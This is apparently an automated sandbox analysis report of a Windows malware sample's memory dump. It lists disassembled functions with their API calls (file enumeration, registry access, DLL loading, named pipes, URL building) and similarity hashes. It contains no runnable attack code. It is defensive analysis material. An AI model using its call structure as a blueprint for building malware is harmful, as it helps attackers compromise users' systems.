  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9E18
  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,001CA93B,00000000,?,?,?), ref: 001C9EA8
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C9E84
    • Part of subcall function 001C947B: lstrlen.KERNEL32(?,001E5048,00000000), ref: 001C94A0
    • Part of subcall function 001C947B: wsprintfA.USER32 ref: 001C94E0
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9514
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C954D
    • Part of subcall function 001C947B: memcpy.NTDLL(?,001EB23B,-000000FA), ref: 001C95B0
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,?,001EB240), ref: 001C95FF
    • Part of subcall function 001C947B: memcpy.NTDLL(?,?,00000000), ref: 001C9619
    • Part of subcall function 001C947B: memcpy.NTDLL(?,00000000,001CAB3A), ref: 001C9638
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C964E
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,?), ref: 001C9672
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C96B4
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C96D3
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,00000008,-000000F7,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C96F2
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000003B), ref: 001C9708
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000001,00000000,?), ref: 001C971D
    • Part of subcall function 001C947B: memmove.NTDLL(00000000,00000000,001CAB3A,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048,00000000), ref: 001C9742
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C978D
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C97A9
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,001EC448,?,?,001CAB3A,001E5048), ref: 001C97C8
    • Part of subcall function 001C947B: StrChrA.SHLWAPI(00000000,0000002C), ref: 001C97DB
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(00000000,001E53C4), ref: 001C97F4
    • Part of subcall function 001C947B: StrTrimA.SHLWAPI(?,001E53C4), ref: 001C9802
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(00000000,00000000,?), ref: 001C9811
    • Part of subcall function 001C947B: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001C982C
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,?,?,?,?,?,?,?,?,?,?,?,001EC448,?), ref: 001C9860
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C98AC
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C98C8
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB239,-00000008,?,?,?,?,?,?,?,?,?,?,?,?,001EC448), ref: 001C98E7
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A,00000000,00000001), ref: 001C992A
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9976
    • Part of subcall function 001C947B: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C9992
    • Part of subcall function 001C947B: memcpy.NTDLL(00000000,001EB23B,-00000006), ref: 001C99B1
    • Part of subcall function 001C947B: memmove.NTDLL(001EB240,00000000,001CAB3A), ref: 001C99E6
    • Part of subcall function 001C947B: HeapFree.KERNEL32(00000000,00000000), ref: 001C9A25
  • HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 53
  • API ID: StrTrim$_struprlstrlenmemcpymemset
  • String ID:
  • API String ID: 2209883122-0
  • Opcode ID: 64815d0257e3aa2b83c4ddbe6b14a35168a99daac82a04345423b0ec2bb7509c
  • Instruction ID: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
  • Opcode Fuzzy Hash: E3018E5665E5F0D1C122289F4818335F842EF806EF719BA259C637068EBE0342607FE9
  • Instruction Fuzzy Hash: f0f5b9b59e6fe8333f99bd5133ddb9f513826102a63fc73ea14bdac57d814e19
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D96C0
  • StrTrimA.SHLWAPI(?,001E53C4), ref: 001D9721
  • _strupr.NTDLL ref: 001D9747
  • StrTrimA.SHLWAPI(?,?), ref: 001D9754
  • StrTrimA.SHLWAPI(00000001,001E53C4), ref: 001D9740
    • Part of subcall function 001C1314: RtlReAllocateHeap.NTDLL(00000000,?,?,001D9773), ref: 001C1324
  • memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 001D979C
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • lstrlen.KERNEL32(?,00000000,?,?,?,00000000,?,00000000,?), ref: 001D97BB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 48
  • API ID: memcpy$HeapFreeRtlAllocateHeapRtlReAllocateHeap
  • String ID: W
  • API String ID: 1276199752-655174618
  • Opcode ID: f18a74b07f9afbff4fbb1da3eaf88715fd0ddee12a97bcb20455e5be1c2ad612
  • Instruction ID: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
  • Opcode Fuzzy Hash: 03016D10445B8247C55B60824161F6FE349BF40299C8DFB729DA8A55DA0F8133165B1F
  • Instruction Fuzzy Hash: c0b03335e1cdc8a4a85f4a27e60ff9fc03c9f2370bcb513438216c7a5ae8850f
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
  • RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9AD3: memcpy.NTDLL(00000000,001C9CB4,00000000,?,?,?,001C9CB4,00000000,?,?,8B50F445,001CAB3A), ref: 001C9B11
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,8B50F445,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9B97
    • Part of subcall function 001C9AD3: memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A), ref: 001C9BCE
    • Part of subcall function 001C9AD3: LocalFree.KERNEL32(001CAB3A,?,?,?,?,?,?,?,?,8B50F445,001CAB3A,?,?,?,?,?), ref: 001C9BDC
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
  • memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 55
  • API ID: HeapFree$RtlImageNtHeaderStrChrStrTrimlstrlen
  • String ID:
  • API String ID: 3913414161-0
  • Opcode ID: 64ffad91cf0a2c2a078577b4f201d2562d86aecfc72bb8ed0596f04317282702
  • Instruction ID: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
  • Opcode Fuzzy Hash: 0401CB24280D82C289019CEE845C63AE54AFB033E290D75B2D7523C00E7B437AF7EF09
  • Instruction Fuzzy Hash: 5c8f5e3f264bf94214ba879482e542f8f17e65cc0a446fb3bbf97f4741ac0ea8
APIs
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • StrChrA.SHLWAPI(00000000,00000020), ref: 001CDB7A
  • StrTrimA.SHLWAPI(00000000,001E53CC), ref: 001CDB90
    • Part of subcall function 001C3B4A: HeapFree.KERNEL32(00000000,?,?), ref: 001C3BCD
  • RtlImageNtHeader.NTDLL(?), ref: 001CDBB8
  • HeapFree.KERNEL32(00000000,?), ref: 001CDBDF
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C1966: lstrlen.KERNEL32(?,00000001,?,?,?,00000001,?,?), ref: 001C19D1
    • Part of subcall function 001C1966: HeapFree.KERNEL32(00000000,00000000), ref: 001C19F9
  • lstrlen.KERNEL32(00000000,00000000,?), ref: 001CDC47
    • Part of subcall function 001C3CF4: RegCloseKey.ADVAPI32(00000057,?,?,001C27E9,001EC202,00000000,00000000,00000000,001EAC78,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C3D3F
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CDC76
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CDC94
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateEventCreateMutexCreateThreadGetLastErrorRtlInitializeCriticalSectionmemcpymemset
  • String ID:
  • API String ID: 850450842-0
  • Opcode ID: 16ca8f20d85ab577bbc2653173ab980685e792abd2a2311232cd2963c8cd0ec7
  • Instruction ID: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
  • Opcode Fuzzy Hash: EDF0DDF30A4E85BBE423A12250A13BA0A03B74A2CEF8D3510FBB5640590F6072E26D45
  • Instruction Fuzzy Hash: 3fadbc5382079b4f520af86300a4450702f7eeedec2a4e1bbd964f091d5ad8f9
APIs
  • memset.NTDLL ref: 001DB75F
  • memcpy.NTDLL(0000002C,00000000,00000010,00000000,00000000,00000054,00000054), ref: 001DB76D
  • RtlInitializeCriticalSection.NTDLL(00000008), ref: 001DB779
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB78C
  • CreateMutexA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,00000054), ref: 001DB7A6
  • CreateThread.KERNEL32(00000000,00000000,001DB47B,?,00000000,?), ref: 001DB7F0
  • GetLastError.KERNEL32(?,?,?,?,?,00000054), ref: 001DB810
    • Part of subcall function 001DB838: SetEvent.KERNEL32(?,001C1F1A,?,001EB068,?,00000000,001C13EB), ref: 001DB84C
    • Part of subcall function 001DB838: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001DB866
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB86F
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB87D
    • Part of subcall function 001DB838: RtlEnterCriticalSection.NTDLL(00000008), ref: 001DB889
    • Part of subcall function 001DB838: RtlLeaveCriticalSection.NTDLL(00000008), ref: 001DB8B2
    • Part of subcall function 001DB838: Sleep.KERNEL32(000001F4), ref: 001DB8C1
    • Part of subcall function 001DB838: CloseHandle.KERNEL32(?), ref: 001DB8CE
    • Part of subcall function 001DB838: LocalFree.KERNEL32(?), ref: 001DB8DC
    • Part of subcall function 001DB838: RtlDeleteCriticalSection.NTDLL(00000008), ref: 001DB8E6
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFreeRtlEnterCriticalSectionRtlLeaveCriticalSectionSleeplstrcpylstrlenmemcpy
  • String ID:
  • API String ID: 2790639078-0
  • Opcode ID: 1766a587401683fdb30044bc6672b38e50223d8055563f5057ad240d85219721
  • Instruction ID: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
  • Opcode Fuzzy Hash: 5301CB70045D41C7DA7730898822B75C948FF5A3F1C0D6F71ED127468A6F83719AEA4E
  • Instruction Fuzzy Hash: f742db94e7bccdeb672c9316879cf6e869411e6e683690c3bbd30f2f23ea435e
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
  • memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
  • lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
  • Sleep.KERNEL32(0000000A), ref: 001C58F2
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 43
  • API ID: HeapFree$CloseHandleRtlImageNtHeader
  • String ID: [FILE]$[FILE]
  • API String ID: 2457384462-3230400787
  • Opcode ID: 16df8d8f854be46f27ed78846379e5e64a1e712c0788b603984e536008b4b39b
  • Instruction ID: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
  • Opcode Fuzzy Hash: 94F0AC39154F43A7892360C4A0207A99B84FFA21D1C8CA723E9857D1CF7E033262BE43
  • Instruction Fuzzy Hash: 7a99e9afe2944490d027556a012c57452c29353fe49cd997913ba4f9baac3b11
APIs
  • RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C29BF: RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C29D8
    • Part of subcall function 001C29BF: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,001C2A7A,00000000), ref: 001C2A06
    • Part of subcall function 001C29BF: lstrlenW.KERNEL32(00000000,?,?,001C2A7A,00000000), ref: 001C2A12
    • Part of subcall function 001C29BF: HeapFree.KERNEL32(00000000,00000000), ref: 001C2A2A
  • CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2884: lstrcatW.KERNEL32(00000000,00000000), ref: 001C2896
    • Part of subcall function 001C2884: WaitForSingleObject.KERNEL32(00002710,00000000), ref: 001C28B9
    • Part of subcall function 001C2884: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000), ref: 001C28DB
    • Part of subcall function 001C2884: GetLastError.KERNEL32(?,001C2AC6,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C28EF
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001D9EAA: lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
    • Part of subcall function 001D9EAA: lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
    • Part of subcall function 001D9EAA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
    • Part of subcall function 001D9E63: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001D9E93
  • HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C28FD: RegOpenKeyA.ADVAPI32(80000001,001EC2F4,00000000), ref: 001C2917
    • Part of subcall function 001C28FD: lstrcmpiW.KERNEL32(00001000,00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000), ref: 001C294D
    • Part of subcall function 001C28FD: lstrlenW.KERNEL32(00000000,00000000,00001000,00000000,00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000), ref: 001C295A
    • Part of subcall function 001C28FD: RegCloseKey.ADVAPI32(00000000,?,?,?,001C2B34,00000000,00000001,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001C29B0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
